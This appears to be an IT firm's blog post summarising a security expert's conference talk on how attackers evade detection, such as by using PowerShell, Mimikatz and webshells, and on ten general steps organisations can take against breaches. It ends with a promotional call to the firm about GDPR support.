10 ways to prevent breaches and minimise impact

Attackers are continually adapting to security technologies to fly under the radar, but taking action in 10 key areas can reduce the risk of breaches and minimise their impact, according to a resilience expert.

According to Jibran Llyas the vice-president of cyber resilience at Stroz Friedberg, attackers more and more have the ability to avoid exposure by modifying their methods to the tools security defenders are using.

Jibran Llyas told a conference in Vancouver Canada this year that a very good example of this is where attackers are depending less on malware and using admin tools instead which are built into operating systems like Microsoft Windows.

“Attackers are using tools like PowerShell to launch attacks rather than malware, and as a result they are going undetected because no security technology is going to block a legitimate administration tool.”

Likewise, less attackers are using round the clock communications with their command and control servers to bypass exposure where security tools monitor for these types of communications.

“Because attackers are finding it relatively easy to get into networks, they are going in, moving laterally, finding the data they are interested in, exfiltrating it and then shutting down operations without using any malware at all,” said Ilyas.

Attackers in addition are creating anti-forensics methods, he said, by establishing what artefacts those tools are using and then either avoiding using them or making sure they are wiped as part of the attack.

Llyas is saying that more and more common ways of getting into organisations, include things like carrying out phishing attacks through compromised email accounts of the friend, partners, clients and colleagues of their target person and through subscribed mailing lists that tend to be trusted by recipients.

Stroz Friedberg is also seeing the use of information which is publicly available from a wide range of sources where there is the ability to reset account passwords to take control or to create subdomains of legitimate organisations to trick people into sharing their usernames and passwords.

“This is why it is becoming critical to use at least two-factor authentication to stop attackers from accessing accounts to send phishing emails or to hack domain registrars to manipulate subdomains,” said Ilyas.

Cyber defenders also need to be aware that attackers more and more are breaching branch or overseas office networks where they can use different methods to hop over to the main network and exploit undisclosed vulnerabilities in publicly available portals, such as password reset portals.

Cyber resilience are seeing attackers using a webshell on web servers to send commands, they are using tools like Mimikatz and Mimikittenz to take out passwords from a computer’s memory, they are using task schedule to execute commands, using tunnelling tools such as Tunna Webshell on a compromised webserver to hop around networks, and using signed binaries to run malicious code in dynamic link libraries (DLLs).

Steps to improve cyber security

In the face of these challenges, Ilyas said cyber defenders can prevent intrusions and minimise the impact in 10 key ways:

  1. There needs to be a mindset shift. Organisations need to understand that if they have any data of value, attackers will come after them. “Having a protection plan of highest risk assets is one thing, but organisations need to ask if they can detect unauthorised access to the assets,” said Ilyas.
  2. Know where there is a security risk. “We often hear that organisations are unaware of the existence of a server or that it contained sensitive data,” said Ilyas.
  3. Organisations need to understand that it is not enough to secure the data on servers because there is a lot of sensitive data on endpoints. According to Ilyas, organisations often overlook data in emails, spreadsheets, browser password and session cookies.
  4. Avoid single factor authentication, not just for the main VPN access, but whatever other public portals an organisation has, such as Outlook Web Access (OWA).
  5. Consider advanced threat detection systems to get more context on threats. “Remember, real attacks start when attackers get inside the environment and pose like insiders,” said Ilyas.
  6. Avoid burn out for cyber security administrators. “When you hire top talent for security innovations, don’t give them the day to day that consumes most of their time,” he said, adding that continuity in a security team is a good thing as it ensures defenders know as much or more than attackers about their IT environment, instead of the other way around.
  7. Pay attention to systems that have propagation capabilities. “This includes security tools like antivirus servers, Microsoft SCCM and file integrity management servers because attackers like to use a victim’s security tools against them,” said Ilyas.
  8. Whitelisting security systems are not enough. “Defenders need to understand what built-in Windows applications could cause them harm,” said Ilyas.
  9. Monitor logs like you mean it, not just for compliance. “Network metadata should be retained for monitoring and investigations. Tuning of Siem [security information and event management] systems should be an ongoing project,” said Ilyas.
  10. Invest in a threat hunting programme to scan proactively for attackers’ techniques, tactics and procedures. “The goal should be to stop attackers before they complete the full attack,” said Ilyas.

At TIVA IT Solutions Ltd we can provide support and assistance in these areas, especially with the General Data Protection Regulation coming into force on 25th of May 2018, don’t delay and call us in the office on 01252 350690 where we can talk you through how we can help.